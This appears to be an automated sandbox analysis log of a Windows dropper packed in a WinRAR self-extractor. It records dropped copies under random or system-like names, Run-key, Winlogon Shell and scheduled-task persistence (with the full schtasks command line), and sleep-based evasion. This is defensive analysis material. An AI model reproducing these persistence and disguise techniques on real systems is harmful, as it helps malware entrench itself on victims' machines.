                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Section loaded: mscoree.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Section loaded: kernel.appcore.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Section loaded: version.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Section loaded: uxtheme.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Section loaded: windows.storage.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Section loaded: wldp.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Section loaded: profapi.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Section loaded: cryptsp.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Section loaded: rsaenh.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Section loaded: cryptbase.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Section loaded: sspicli.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: mscoree.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: apphelp.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: version.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: uxtheme.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: windows.storage.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: wldp.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: profapi.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: cryptsp.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: rsaenh.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: cryptbase.dll
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: sspicli.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: mscoree.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: version.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: uxtheme.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: windows.storage.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: wldp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: profapi.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: cryptsp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: rsaenh.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Section loaded: cryptbase.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: sspicli.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: mscoree.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: version.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: uxtheme.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: windows.storage.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: wldp.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: profapi.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: cryptsp.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: rsaenh.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: cryptbase.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: version.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                    Source: 7aHY4r6vXR.exe Static file information: File size 14707581 > 1048576
                                    Source: 7aHY4r6vXR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: 7aHY4r6vXR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: 7aHY4r6vXR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: 7aHY4r6vXR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: 7aHY4r6vXR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: 7aHY4r6vXR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: 7aHY4r6vXR.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 7aHY4r6vXR.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.pdb source: bridgeServerFontSavesMonitor.exe, 00000004.00000002.1849804431.000000000393F000.00000004.00000800.00020000.00000000.sdmp
                                    Source: 7aHY4r6vXR.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: 7aHY4r6vXR.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: 7aHY4r6vXR.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: 7aHY4r6vXR.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: 7aHY4r6vXR.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline"
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe File created: C:\ChainBroker\__tmp_rar_sfx_access_check_5981078
                                    Source: 7aHY4r6vXR.exe Static PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Code function: 0_2_00BEF640 push ecx; ret 0_2_00BEF653
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Code function: 0_2_00BEEB78 push eax; ret 0_2_00BEEB96
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 4_2_00007FFD9BAD4B3C push ebp; retf 4_2_00007FFD9BAD4B42
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 4_2_00007FFD9BEC86CE push es; ret 4_2_00007FFD9BEC86CF
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 4_2_00007FFD9BEC54EC push cs; iretd 4_2_00007FFD9BEC561F
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 29_2_00007FFD9BAB4B3C push ebp; retf 29_2_00007FFD9BAB4B42
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 32_2_00007FFD9BAA4B3C push ebp; retf 32_2_00007FFD9BAA4B42
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 35_2_00007FFD9BAD4AC2 push E812C57Eh; retf 35_2_00007FFD9BAD4AC9
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 35_2_00007FFD9BAD7560 push ebx; iretd 35_2_00007FFD9BAD756A
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 35_2_00007FFD9BAD7550 push ebx; iretd 35_2_00007FFD9BAD756A
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 35_2_00007FFD9BAB896D push ecx; iretd 35_2_00007FFD9BAB896E
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 35_2_00007FFD9BAB955F push esp; ret 35_2_00007FFD9BAB956B
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 35_2_00007FFD9BAA4B3C push ebp; retf 35_2_00007FFD9BAA4B42
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 36_2_00007FFD9BAD896D push ecx; iretd 36_2_00007FFD9BAD896E
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 36_2_00007FFD9BAD955F push esp; ret 36_2_00007FFD9BAD956B
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 36_2_00007FFD9BAC4B3C push ebp; retf 36_2_00007FFD9BAC4B42
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 36_2_00007FFD9BAF4AC2 push E8127A7Eh; retf 36_2_00007FFD9BAF4AC9
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 36_2_00007FFD9BAF7560 push ebx; iretd 36_2_00007FFD9BAF756A
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Code function: 36_2_00007FFD9BAF7550 push ebx; iretd 36_2_00007FFD9BAF756A
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 38_2_00007FFD9BAC4B3C push ebp; retf 38_2_00007FFD9BAC4B42
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 38_2_00007FFD9BAF4AC2 push E813227Eh; retf 38_2_00007FFD9BAF4AC9
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 38_2_00007FFD9BAF7560 push ebx; iretd 38_2_00007FFD9BAF756A
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 38_2_00007FFD9BAF7550 push ebx; iretd 38_2_00007FFD9BAF756A
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 38_2_00007FFD9BAD9F43 push 8B48FFFFh; iretd 38_2_00007FFD9BAD9F4E
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 38_2_00007FFD9BAD896D push ecx; iretd 38_2_00007FFD9BAD896E
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 38_2_00007FFD9BAD955F push esp; ret 38_2_00007FFD9BAD956B
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 41_2_00007FFD9BADF74A push es; ret 41_2_00007FFD9BADF74B
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 41_2_00007FFD9BAB4B3C push ebp; retf 41_2_00007FFD9BAB4B42
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 41_2_00007FFD9BAE4AC2 push E8138E7Eh; retf 41_2_00007FFD9BAE4AC9
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 41_2_00007FFD9BAE7560 push ebx; iretd 41_2_00007FFD9BAE756A
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Code function: 41_2_00007FFD9BAE7550 push ebx; iretd 41_2_00007FFD9BAE756A
                                    Source: bridgeServerFontSavesMonitor.exe.0.dr Static PE information: section name: .text entropy: 7.5410078719892475
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe.4.dr Static PE information: section name: .text entropy: 7.5410078719892475
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe0.4.dr Static PE information: section name: .text entropy: 7.5410078719892475
                                    Source: RuntimeBroker.exe.4.dr Static PE information: section name: .text entropy: 7.5410078719892475
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe1.4.dr Static PE information: section name: .text entropy: 7.5410078719892475
                                    Source: SfLAFHFXIbHzHGgilQgXtKOw.exe2.4.dr Static PE information: section name: .text entropy: 7.5410078719892475

                                    Persistence and Installation Behavior

                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe File created: C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe File created: C:\Users\user\Desktop\VObntHLa.log
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe File created: C:\Users\user\Desktop\ARUSTYfT.log
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe File created: C:\Users\user\Desktop\hzhmzTUD.log
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe File created: C:\Windows\SchCache\RuntimeBroker.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe File created: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe File created: C:\Users\user\Desktop\riACjval.log
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe File created: C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe File created: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe File created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe

                                    Boot Survival

                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOw
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeServerFontSavesMonitor
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe File created: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOw
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeServerFontSavesMonitor
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 13A0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 1B020000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: B50000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 1A6C0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: FF0000 memory reserve | memory write watch
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 1AD20000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 1350000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 1AC50000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: D20000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 1A7A0000 memory reserve | memory write watch
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 14C0000 memory reserve | memory write watch
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 1B220000 memory reserve | memory write watch
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 1770000 memory reserve | memory write watch
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 1E20000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 2370000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: 1A3E0000 memory reserve | memory write watch
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 800000 memory reserve | memory write watch
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeMemory allocated: 1A3B0000 memory reserve | memory write watch
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VObntHLa.log
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ARUSTYfT.log
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hzhmzTUD.log
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Dropped PE file which has not been started: C:\Users\user\Desktop\riACjval.log
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Evasive API call chain: GetLocalTime,DecisionNodes graph_0-23436
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe TID: 1136Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
